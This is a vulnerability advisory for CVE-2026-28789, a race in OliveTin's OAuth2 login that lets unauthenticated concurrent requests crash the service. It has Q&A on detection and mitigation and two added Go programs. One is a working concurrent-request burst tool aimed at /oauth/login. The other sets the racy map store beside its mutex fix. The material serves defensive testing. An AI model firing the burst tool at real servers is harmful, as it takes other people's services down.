CVE-2026-28789
Unauthenticated DoS via OAuth2 Login Race in OliveTin
Publication date: 2026-03-05
Last updated on: 2026-03-10
Assigner: GitHub, Inc.
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| olivetin | olivetin | up to and including 3000.10.2 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-400 | The product does not properly control the allocation and maintenance of a limited resource. |
| CWE-362 | The product contains a concurrent code sequence that requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence operating concurrently. |
| CWE-662 | The product utilizes multiple threads, processes, components, or systems to allow temporary access to a shared resource that can only be exclusive to one process at a time, but it does not properly synchronize these actions, which might cause simultaneous accesses of this resource by multiple threads or processes. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-28789 is a vulnerability in OliveTin's OAuth2 login flow: concurrent requests to the /oauth/login endpoint cause unsynchronized access to a shared map named registeredStates. The map tracks pending OAuth2 login states, but it is written without any lock, so overlapping requests produce concurrent map writes.

Because Go's HTTP server runs each request handler in its own goroutine, several simultaneous requests can race on the map. The Go runtime detects this and aborts the whole process with "fatal error: concurrent map writes". This is a runtime throw rather than an ordinary panic, so it cannot be caught with recover(); the OliveTin service crashes, resulting in a denial of service (DoS).

The endpoint is reachable without authentication, so the issue can be exploited remotely by sending many concurrent requests to the OAuth2 login endpoint. It was fixed by guarding access to the shared map with a mutex, which serialises the writes and removes the race. [1, 2]
How can this vulnerability impact me?
This vulnerability can cause the OliveTin service to crash unexpectedly when OAuth2 login is enabled and the /oauth/login endpoint receives concurrent requests.
An attacker can exploit this remotely without authentication by sending many simultaneous requests, triggering a race condition that leads to a runtime panic and process termination.
The impact is a denial-of-service (DoS) condition, causing loss of availability of the OliveTin service until it is manually restarted or recovered.
- No confidentiality or integrity impact.
- High availability impact due to service crashes.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for crashes of the OliveTin process caused by concurrent map writes in the OAuth2 login flow.

Specifically, look for log entries containing the Go runtime message "fatal error: concurrent map writes", with a goroutine trace that points into the OAuth2 handler code.

A practical (and destructive) confirmation method is to send a high volume of concurrent HTTP requests to the /oauth/login endpoint of a test instance and observe whether the service crashes or logs the fatal error. Because a successful test takes the service down, run it only against a non-production instance or in an agreed maintenance window. Note that a single sequential curl loop is unlikely to trigger the race; the requests must overlap, so use a script with multiple workers or background the requests. [2]
- Use a script that sends many concurrent requests to the /oauth/login endpoint, for example a Python script with a thread pool or a shell loop that backgrounds each curl call.
- Monitor the OliveTin service logs for runtime fatal errors mentioning "concurrent map writes".
- Check the service status to see if the process terminates unexpectedly after such requests.
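The concurrent-request probe described above, as an added example that is not part of this advisory or of OliveTin: all requests are released at once so they overlap inside the server's handler, redirects are not followed (a login endpoint normally answers with a redirect to the identity provider), and transport errors such as connection refused or reset are counted separately, because that is how a crash shows up from the client side. The default URL and port are assumptions; adjust them to the instance under test.

```go
// Added example (not OliveTin code): fire n concurrent GET requests at a
// target URL and tally the outcomes. If a vulnerable OliveTin instance is
// behind the URL, the concurrent map writes can crash it, which shows up
// here as transport errors (refused/reset) partway through the burst.
package main

import (
	"flag"
	"fmt"
	"net/http"
	"sync"
	"time"
)

// Result summarises one burst of concurrent requests.
type Result struct {
	OK     int         // requests that received any HTTP response
	Errors int         // transport-level failures (refused, reset, timeout)
	Status map[int]int // count per HTTP status code
}

// Burst sends n requests to url concurrently. Every goroutine waits on the
// start channel so the requests overlap rather than trickle out one by one.
func Burst(url string, n int, timeout time.Duration) Result {
	client := &http.Client{
		Timeout: timeout,
		// Do not follow the redirect to the OAuth2 provider; we only care
		// whether OliveTin itself answers.
		CheckRedirect: func(*http.Request, []*http.Request) error {
			return http.ErrUseLastResponse
		},
	}
	var mu sync.Mutex
	res := Result{Status: map[int]int{}}
	start := make(chan struct{})
	var wg sync.WaitGroup
	for i := 0; i < n; i++ {
		wg.Add(1)
		go func() {
			defer wg.Done()
			<-start // starting gun
			resp, err := client.Get(url)
			mu.Lock()
			defer mu.Unlock()
			if err != nil {
				res.Errors++
				return
			}
			resp.Body.Close()
			res.OK++
			res.Status[resp.StatusCode]++
		}()
	}
	close(start)
	wg.Wait()
	return res
}

func main() {
	// Assumed defaults: OliveTin on localhost, port 1337; change as needed.
	target := flag.String("url", "http://127.0.0.1:1337/oauth/login", "endpoint to probe")
	n := flag.Int("n", 200, "number of concurrent requests")
	flag.Parse()

	r := Burst(*target, *n, 5*time.Second)
	fmt.Printf("ok=%d errors=%d status=%v\n", r.OK, r.Errors, r.Status)
	if r.Errors > 0 {
		fmt.Println("transport errors seen: check the OliveTin log for 'fatal error: concurrent map writes'")
	}
}
```

A burst that starts with 302 responses and then turns into connection errors is the client-side signature of the process dying mid-run; confirm it against the service log rather than from the client counts alone.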
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to upgrade OliveTin to version 3000.10.3 or later, where the vulnerability has been patched.
The patch introduces proper concurrency control using mutex locks to prevent concurrent map writes in the OAuth2 login flow.
If upgrading immediately is not possible, consider disabling OAuth2 login functionality temporarily to prevent exploitation.
Additionally, monitor the service for crashes and restart it when necessary until the patch can be applied, for example through a process supervisor's automatic restart. Automatic restarts shorten each outage but do not stop an attacker from crashing the service again, so they are a stopgap, not a fix.
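The pattern behind the vulnerability and the mutex fix described in the explanation and mitigation sections above, as an added example that is not OliveTin's code. The state store is hypothetical, modelled only on the advisory's description of a shared registeredStates map written from every login request; UnsafeStore keeps the racy shape, SafeStore is the hardened form, and Hammer stands in for the attacker's burst of overlapping /oauth/login requests.

```go
// Added example (not OliveTin's code): a minimal OAuth2 state store in the
// vulnerable shape (plain map, no lock) next to the fixed shape (map behind
// a sync.Mutex), plus a burst generator that plays the role of many
// concurrent /oauth/login requests.
package main

import (
	"crypto/rand"
	"encoding/hex"
	"fmt"
	"sync"
	"time"
)

// newState returns a random OAuth2 state value (the anti-CSRF nonce that
// the callback must echo back).
func newState() string {
	b := make([]byte, 16)
	if _, err := rand.Read(b); err != nil {
		panic(err)
	}
	return hex.EncodeToString(b)
}

// UnsafeStore mirrors the vulnerable shape: a map written from every login
// handler with no synchronisation. Two goroutines writing it at once make
// the Go runtime abort the process with "fatal error: concurrent map
// writes", which recover() cannot catch.
type UnsafeStore struct {
	states map[string]time.Time
}

func (s *UnsafeStore) Register() string {
	st := newState()
	s.states[st] = time.Now() // racy write
	return st
}

// SafeStore is the hardened form: every read and write holds the mutex.
type SafeStore struct {
	mu     sync.Mutex
	states map[string]time.Time
}

func NewSafeStore() *SafeStore {
	return &SafeStore{states: map[string]time.Time{}}
}

// Register issues a new state for a login request (the /oauth/login side).
func (s *SafeStore) Register() string {
	st := newState()
	s.mu.Lock()
	defer s.mu.Unlock()
	s.states[st] = time.Now()
	return st
}

// Consume validates a state presented on the callback and removes it, so
// each state is single use; it also rejects states older than maxAge.
func (s *SafeStore) Consume(st string, maxAge time.Duration) bool {
	s.mu.Lock()
	defer s.mu.Unlock()
	issued, ok := s.states[st]
	if !ok {
		return false
	}
	delete(s.states, st)
	return time.Since(issued) <= maxAge
}

// Len reports how many states are pending (also under the lock).
func (s *SafeStore) Len() int {
	s.mu.Lock()
	defer s.mu.Unlock()
	return len(s.states)
}

// Registrar is satisfied by both stores so Hammer can drive either one.
type Registrar interface{ Register() string }

// Hammer simulates n login requests whose handlers run at the same time,
// which is exactly what an unauthenticated request burst produces.
func Hammer(r Registrar, n int) []string {
	out := make([]string, n)
	var wg sync.WaitGroup
	start := make(chan struct{})
	for i := range out {
		wg.Add(1)
		go func(i int) {
			defer wg.Done()
			<-start // release all goroutines together
			out[i] = r.Register()
		}(i)
	}
	close(start)
	wg.Wait()
	return out
}

func main() {
	safe := NewSafeStore()
	states := Hammer(safe, 1000)
	fmt.Printf("registered %d states, store holds %d\n", len(states), safe.Len())
	fmt.Println("valid callback:", safe.Consume(states[0], time.Minute))
	fmt.Println("replayed callback:", safe.Consume(states[0], time.Minute))

	// To see the vulnerable behaviour, point the same burst at the unsafe
	// store; expect the process to die with "fatal error: concurrent map
	// writes" (or build with -race to have the race flagged instead):
	//   Hammer(&UnsafeStore{states: map[string]time.Time{}}, 1000)
}
```

Running the program with `go run -race .` and the UnsafeStore line uncommented reports the race deterministically, which is the cheapest way to catch this class of bug before it ships; the SafeStore version runs clean under the detector.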